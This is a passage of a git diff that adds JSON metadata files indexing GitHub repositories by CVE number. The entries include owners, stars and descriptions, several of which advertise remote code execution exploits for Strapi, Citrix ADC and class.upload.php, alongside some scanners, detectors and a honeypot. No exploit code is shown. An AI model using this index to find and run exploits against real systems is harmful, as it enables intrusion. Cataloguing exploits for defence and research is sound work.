"forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19576.json b/2019/CVE-2019-19576.json new file mode 100644 index 0000000000..831ca627a0 --- /dev/null +++ b/2019/CVE-2019-19576.json @@ -0,0 +1,33 @@ +[ + { + "id": 225892994, + "name": "CVE-2019-19576", + "full_name": "jra89\/CVE-2019-19576", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19576", + "description": "This is a filter bypass exploit that results in arbitrary file upload and remote code execution in class.upload.php <= 2.0.3", + "fork": false, + "created_at": "2019-12-04T15:01:00Z", + "updated_at": "2024-02-01T23:13:30Z", + "pushed_at": "2020-01-23T15:48:37Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19609.json b/2019/CVE-2019-19609.json new file mode 100644 index 0000000000..a115055430 --- /dev/null +++ b/2019/CVE-2019-19609.json @@ -0,0 +1,224 @@ +[ + { + "id": 401087194, + "name": "CVE-2019-19609", + "full_name": "ebadfd\/CVE-2019-19609", + "owner": { + "login": "ebadfd", + "id": 66930150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66930150?v=4", + "html_url": "https:\/\/github.com\/ebadfd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ebadfd\/CVE-2019-19609", + "description": "Strapi Framework Vulnerable to Remote Code Execution ", + "fork": false, + "created_at": "2021-08-29T16:18:27Z", + "updated_at": "2022-03-08T18:00:19Z", + "pushed_at": "2021-08-29T16:34:16Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 401107727, + "name": "CVE-2019-19609-EXPLOIT", + "full_name": "diego-tella\/CVE-2019-19609-EXPLOIT", + "owner": { + "login": "diego-tella", + "id": 70545257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70545257?v=4", + "html_url": "https:\/\/github.com\/diego-tella", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diego-tella\/CVE-2019-19609-EXPLOIT", + "description": "Exploit for CVE-2019-19609 in Strapi (Remote Code Execution) ", + "fork": false, + "created_at": "2021-08-29T17:57:08Z", + "updated_at": "2024-01-04T23:28:19Z", + "pushed_at": "2021-08-30T22:36:16Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 401200203, + "name": "CVE-2019-19609", + "full_name": "guglia001\/CVE-2019-19609", + "owner": { + "login": "guglia001", + "id": 7321539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7321539?v=4", + "html_url": "https:\/\/github.com\/guglia001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guglia001\/CVE-2019-19609", + "description": "Strapi <= 3.0.0-beta.17.8 authenticated remote code execution", + "fork": false, + "created_at": "2021-08-30T03:05:16Z", + "updated_at": "2021-08-30T03:11:35Z", + "pushed_at": "2021-08-30T03:11:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 405306886, + "name": "CVE-2019-19609", + "full_name": "D3m0nicw0lf\/CVE-2019-19609", + "owner": { + "login": "D3m0nicw0lf", + "id": 22528146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22528146?v=4", + "html_url": "https:\/\/github.com\/D3m0nicw0lf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D3m0nicw0lf\/CVE-2019-19609", + "description": "Strapi Remote Code Execution", + "fork": false, + "created_at": "2021-09-11T06:53:33Z", + "updated_at": "2021-09-11T07:04:27Z", + "pushed_at": "2021-09-11T07:04:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 432475559, + "name": "CVE-2019-19609-POC-Python", + "full_name": "n000xy\/CVE-2019-19609-POC-Python", + "owner": { + "login": "n000xy", + "id": 45253703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45253703?v=4", + "html_url": "https:\/\/github.com\/n000xy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n000xy\/CVE-2019-19609-POC-Python", + "description": "Strapi Framework, 3.0.0-beta.17.4", + "fork": false, + "created_at": "2021-11-27T13:58:18Z", + "updated_at": "2022-07-14T13:47:06Z", + "pushed_at": "2021-11-27T14:15:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436300401, + "name": "CVE-2019-19609-EXPLOIT", + "full_name": "RamPanic\/CVE-2019-19609-EXPLOIT", + "owner": { + "login": "RamPanic", + "id": 67488206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67488206?v=4", + "html_url": "https:\/\/github.com\/RamPanic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RamPanic\/CVE-2019-19609-EXPLOIT", + "description": null, + "fork": false, + "created_at": "2021-12-08T15:38:20Z", + "updated_at": "2024-08-12T20:18:40Z", + "pushed_at": "2021-12-08T15:38:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 451013072, + "name": "CVE-2019-19609", + "full_name": "glowbase\/CVE-2019-19609", + "owner": { + "login": "glowbase", + "id": 45991010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45991010?v=4", + "html_url": "https:\/\/github.com\/glowbase", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glowbase\/CVE-2019-19609", + "description": "Strapi CMS 3.0.0-beta.17.4 - Unauthenticated Remote Code Execution (CVE-2019-18818, CVE-2019-19609)", + "fork": false, + "created_at": "2022-01-23T05:28:51Z", + "updated_at": "2024-02-05T07:30:49Z", + "pushed_at": "2022-01-25T00:41:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-18818", + "cve-2019-19609", + "rce", + "strapi" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19633.json b/2019/CVE-2019-19633.json new file mode 100644 index 0000000000..a093cad715 --- /dev/null +++ b/2019/CVE-2019-19633.json @@ -0,0 +1,33 @@ +[ + { + "id": 226651422, + "name": "CVE-2019-19633", + "full_name": "jra89\/CVE-2019-19633", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19633", + "description": "lib\/G\/functions.php in Chevereto 1.0.0 through 1.1.4 Free, and through 3.13.5 Core, allows an attacker to perform bruteforce attacks without triggering the implemented protection mechanism by manipulating the X-Forwarded-For header in the request.", + "fork": false, + "created_at": "2019-12-08T10:42:28Z", + "updated_at": "2020-01-11T13:35:20Z", + "pushed_at": "2019-12-21T12:35:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19634.json b/2019/CVE-2019-19634.json new file mode 100644 index 0000000000..a562eae048 --- /dev/null +++ b/2019/CVE-2019-19634.json @@ -0,0 +1,33 @@ +[ + { + "id": 226651675, + "name": "CVE-2019-19634", + "full_name": "jra89\/CVE-2019-19634", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19634", + "description": "This is a filter bypass exploit that results in arbitrary file upload and remote code execution in class.upload.php <= 2.0.4", + "fork": false, + "created_at": "2019-12-08T10:44:51Z", + "updated_at": "2024-08-12T19:55:33Z", + "pushed_at": "2019-12-08T17:55:01Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19651.json b/2019/CVE-2019-19651.json new file mode 100644 index 0000000000..2e4014e44a --- /dev/null +++ b/2019/CVE-2019-19651.json @@ -0,0 +1,33 @@ +[ + { + "id": 227379066, + "name": "CVE-2019-19651", + "full_name": "jra89\/CVE-2019-19651", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19651", + "description": "Chevereto reflected XSS in Website Name - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core", + "fork": false, + "created_at": "2019-12-11T14:00:32Z", + "updated_at": "2020-08-27T17:38:10Z", + "pushed_at": "2019-12-11T14:11:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19652.json b/2019/CVE-2019-19652.json new file mode 100644 index 0000000000..5291a15153 --- /dev/null +++ b/2019/CVE-2019-19652.json @@ -0,0 +1,33 @@ +[ + { + "id": 227375117, + "name": "CVE-2019-19652", + "full_name": "jra89\/CVE-2019-19652", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19652", + "description": "Chevereto downgrade attack - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core", + "fork": false, + "created_at": "2019-12-11T13:42:18Z", + "updated_at": "2020-01-11T13:36:18Z", + "pushed_at": "2019-12-11T14:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19653.json b/2019/CVE-2019-19653.json new file mode 100644 index 0000000000..5a33ff914a --- /dev/null +++ b/2019/CVE-2019-19653.json @@ -0,0 +1,33 @@ +[ + { + "id": 227376725, + "name": "CVE-2019-19653", + "full_name": "jra89\/CVE-2019-19653", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19653", + "description": "Chevereto information disclosure <= 3.13.5 Core", + "fork": false, + "created_at": "2019-12-11T13:49:51Z", + "updated_at": "2020-01-11T13:34:47Z", + "pushed_at": "2020-01-06T13:57:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19654.json b/2019/CVE-2019-19654.json new file mode 100644 index 0000000000..0d8be8e74d --- /dev/null +++ b/2019/CVE-2019-19654.json @@ -0,0 +1,33 @@ +[ + { + "id": 227360451, + "name": "CVE-2019-19654", + "full_name": "jra89\/CVE-2019-19654", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19654", + "description": "Chevereto denial of service - <= 3.13.5 Core", + "fork": false, + "created_at": "2019-12-11T12:26:16Z", + "updated_at": "2020-01-11T13:34:03Z", + "pushed_at": "2020-01-06T13:58:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19658.json b/2019/CVE-2019-19658.json new file mode 100644 index 0000000000..a6a9f928f7 --- /dev/null +++ b/2019/CVE-2019-19658.json @@ -0,0 +1,33 @@ +[ + { + "id": 227381894, + "name": "CVE-2019-19658", + "full_name": "jra89\/CVE-2019-19658", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19658", + "description": "Chevereto stored XSS in profile page - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core", + "fork": false, + "created_at": "2019-12-11T14:13:51Z", + "updated_at": "2020-01-11T13:35:52Z", + "pushed_at": "2019-12-12T12:07:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19699.json b/2019/CVE-2019-19699.json new file mode 100644 index 0000000000..13063304c5 --- /dev/null +++ b/2019/CVE-2019-19699.json @@ -0,0 +1,33 @@ +[ + { + "id": 234596737, + "name": "CVE-2019-19699", + "full_name": "SpengeSec\/CVE-2019-19699", + "owner": { + "login": "SpengeSec", + "id": 60011198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60011198?v=4", + "html_url": "https:\/\/github.com\/SpengeSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpengeSec\/CVE-2019-19699", + "description": "Centreon =<19.10 Authenticated RCE", + "fork": false, + "created_at": "2020-01-17T17:07:45Z", + "updated_at": "2021-01-17T09:31:20Z", + "pushed_at": "2020-04-04T09:30:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19781.json b/2019/CVE-2019-19781.json new file mode 100644 index 0000000000..88b240de9a --- /dev/null +++ b/2019/CVE-2019-19781.json @@ -0,0 +1,1504 @@ +[ + { + "id": 233143985, + "name": "CVE-2019-19781", + "full_name": "projectzeroindia\/CVE-2019-19781", + "owner": { + "login": "projectzeroindia", + "id": 54312442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54312442?v=4", + "html_url": "https:\/\/github.com\/projectzeroindia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/projectzeroindia\/CVE-2019-19781", + "description": "Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [ CVE-2019-19781 ]", + "fork": false, + "created_at": "2020-01-10T22:56:35Z", + "updated_at": "2024-08-12T19:56:29Z", + "pushed_at": "2020-01-18T07:01:29Z", + "stargazers_count": 371, + "watchers_count": 371, + "has_discussions": false, + "forks_count": 115, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 115, + "watchers": 371, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 233151210, + "name": "cve-2019-19781", + "full_name": "trustedsec\/cve-2019-19781", + "owner": { + "login": "trustedsec", + "id": 3160808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3160808?v=4", + "html_url": "https:\/\/github.com\/trustedsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustedsec\/cve-2019-19781", + "description": "This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.", + "fork": false, + "created_at": "2020-01-11T00:08:27Z", + "updated_at": "2024-10-15T14:57:17Z", + "pushed_at": "2020-01-22T20:23:51Z", + "stargazers_count": 571, + "watchers_count": 571, + "has_discussions": false, + "forks_count": 129, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 129, + "watchers": 571, + "score": 0, + "subscribers_count": 29 + }, + { + "id": 233152918, + "name": "check-cve-2019-19781", + "full_name": "cisagov\/check-cve-2019-19781", + "owner": { + "login": "cisagov", + "id": 18539691, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18539691?v=4", + "html_url": "https:\/\/github.com\/cisagov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cisagov\/check-cve-2019-19781", + "description": "Test a host for susceptibility to CVE-2019-19781", + "fork": false, + "created_at": "2020-01-11T00:26:16Z", + "updated_at": "2024-08-12T19:56:30Z", + "pushed_at": "2020-10-23T19:35:42Z", + "stargazers_count": 107, + "watchers_count": 107, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix", + "cve-2019-19781", + "cwe-22", + "vulnerability" + ], + "visibility": "public", + "forks": 27, + "watchers": 107, + "score": 0, + "subscribers_count": 17 + }, + { + "id": 233168483, + "name": "CVE-2019-19781", + "full_name": "jas502n\/CVE-2019-19781", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-19781", + "description": "Citrix ADC Remote Code Execution", + "fork": false, + "created_at": "2020-01-11T03:10:12Z", + "updated_at": "2024-05-30T16:27:33Z", + "pushed_at": "2020-01-11T14:03:52Z", + "stargazers_count": 84, + "watchers_count": 84, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix-gateway", + "cve-2019-19781" + ], + "visibility": "public", + "forks": 24, + "watchers": 84, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233192322, + "name": "CVE-2019-19781", + "full_name": "ianxtianxt\/CVE-2019-19781", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-19781", + "description": "Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [ CVE-2019-19781 ]", + "fork": false, + "created_at": "2020-01-11T07:16:23Z", + "updated_at": "2024-08-12T19:56:30Z", + "pushed_at": "2020-01-11T07:20:44Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233209505, + "name": "CVE-2019-19781", + "full_name": "mpgn\/CVE-2019-19781", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-19781", + "description": "CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit", + "fork": false, + "created_at": "2020-01-11T09:49:17Z", + "updated_at": "2024-08-12T19:56:30Z", + "pushed_at": "2021-01-24T20:18:04Z", + "stargazers_count": 155, + "watchers_count": 155, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 155, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 233232989, + "name": "CVE-2019-19781", + "full_name": "oways\/CVE-2019-19781", + "owner": { + "login": "oways", + "id": 11142952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11142952?v=4", + "html_url": "https:\/\/github.com\/oways", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oways\/CVE-2019-19781", + "description": "CVE-2019-19781 Citrix RCE", + "fork": false, + "created_at": "2020-01-11T13:05:28Z", + "updated_at": "2024-08-12T19:56:30Z", + "pushed_at": "2020-01-11T13:09:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233274912, + "name": "Citrix_CVE-2019-19781", + "full_name": "becrevex\/Citrix_CVE-2019-19781", + "owner": { + "login": "becrevex", + "id": 8326868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8326868?v=4", + "html_url": "https:\/\/github.com\/becrevex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/becrevex\/Citrix_CVE-2019-19781", + "description": "Took at stab at an NSE discovery script for CVE-2019-19781.", + "fork": false, + "created_at": "2020-01-11T18:04:17Z", + "updated_at": "2022-06-27T14:55:57Z", + "pushed_at": "2020-01-11T19:48:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 233294562, + "name": "Exploits_CVE-2019-19781", + "full_name": "unknowndevice64\/Exploits_CVE-2019-19781", + "owner": { + "login": "unknowndevice64", + "id": 23033569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23033569?v=4", + "html_url": "https:\/\/github.com\/unknowndevice64", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unknowndevice64\/Exploits_CVE-2019-19781", + "description": "All Working Exploits", + "fork": false, + "created_at": "2020-01-11T20:43:09Z", + "updated_at": "2021-04-19T06:52:48Z", + "pushed_at": "2020-01-11T22:09:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 233412280, + "name": "citrixmash_scanner", + "full_name": "haxrob\/citrixmash_scanner", + "owner": { + "login": "haxrob", + "id": 11153104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11153104?v=4", + "html_url": "https:\/\/github.com\/haxrob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haxrob\/citrixmash_scanner", + "description": "A fast multi threaded scanner for Citrix ADC (NetScaler) CVE-2019-19781 - Citrixmash \/ Shitrix", + "fork": false, + "created_at": "2020-01-12T15:16:54Z", + "updated_at": "2024-11-16T19:52:59Z", + "pushed_at": "2020-01-17T22:01:20Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix", + "citrixmash", + "cve-2019-19781", + "scanner", + "shitrix" + ], + "visibility": "public", + "forks": 8, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233441884, + "name": "Shitrix-CVE-2019-19781", + "full_name": "jamesjguthrie\/Shitrix-CVE-2019-19781", + "owner": { + "login": "jamesjguthrie", + "id": 1792678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1792678?v=4", + "html_url": "https:\/\/github.com\/jamesjguthrie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamesjguthrie\/Shitrix-CVE-2019-19781", + "description": "My working exploit script for Shitrix (CVE-2019-19781)", + "fork": false, + "created_at": "2020-01-12T18:53:29Z", + "updated_at": "2022-11-03T08:09:07Z", + "pushed_at": "2020-07-21T15:54:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 233473212, + "name": "CVE-2019-19781", + "full_name": "haxrob\/CVE-2019-19781", + "owner": { + "login": "haxrob", + "id": 11153104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11153104?v=4", + "html_url": "https:\/\/github.com\/haxrob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haxrob\/CVE-2019-19781", + "description": "DFIR notes for Citrix ADC (NetScaler) appliances vulnerable to CVE-2019-19781", + "fork": false, + "created_at": "2020-01-12T23:13:56Z", + "updated_at": "2024-08-12T19:56:33Z", + "pushed_at": "2020-02-05T11:45:25Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 45, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 233493025, + "name": "CVE-2019-19781", + "full_name": "hollerith\/CVE-2019-19781", + "owner": { + "login": "hollerith", + "id": 659626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/659626?v=4", + "html_url": "https:\/\/github.com\/hollerith", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hollerith\/CVE-2019-19781", + "description": "Citrix Netscaler RCE", + "fork": false, + "created_at": "2020-01-13T02:14:59Z", + "updated_at": "2020-01-13T02:29:06Z", + "pushed_at": "2020-01-13T02:29:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233538988, + "name": "CVE-2019-19781", + "full_name": "aqhmal\/CVE-2019-19781", + "owner": { + "login": "aqhmal", + "id": 22043590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22043590?v=4", + "html_url": "https:\/\/github.com\/aqhmal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aqhmal\/CVE-2019-19781", + "description": "Automated script for Citrix ADC scanner (CVE-2019-19781) using hosts retrieved from Shodan API. You must have a Shodan account to use this script.", + "fork": false, + "created_at": "2020-01-13T07:42:27Z", + "updated_at": "2023-09-08T18:02:13Z", + "pushed_at": "2020-01-14T15:53:14Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automated-testing", + "citrix-netscaler", + "information-extraction", + "pentest-script", + "python3", + "shodan" + ], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233566324, + "name": "CitrixHoneypot", + "full_name": "MalwareTech\/CitrixHoneypot", + "owner": { + "login": "MalwareTech", + "id": 7256561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7256561?v=4", + "html_url": "https:\/\/github.com\/MalwareTech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalwareTech\/CitrixHoneypot", + "description": "Detect and log CVE-2019-19781 scan and exploitation attempts.", + "fork": false, + "created_at": "2020-01-13T10:09:31Z", + "updated_at": "2024-08-25T14:56:02Z", + "pushed_at": "2020-01-15T13:58:22Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + 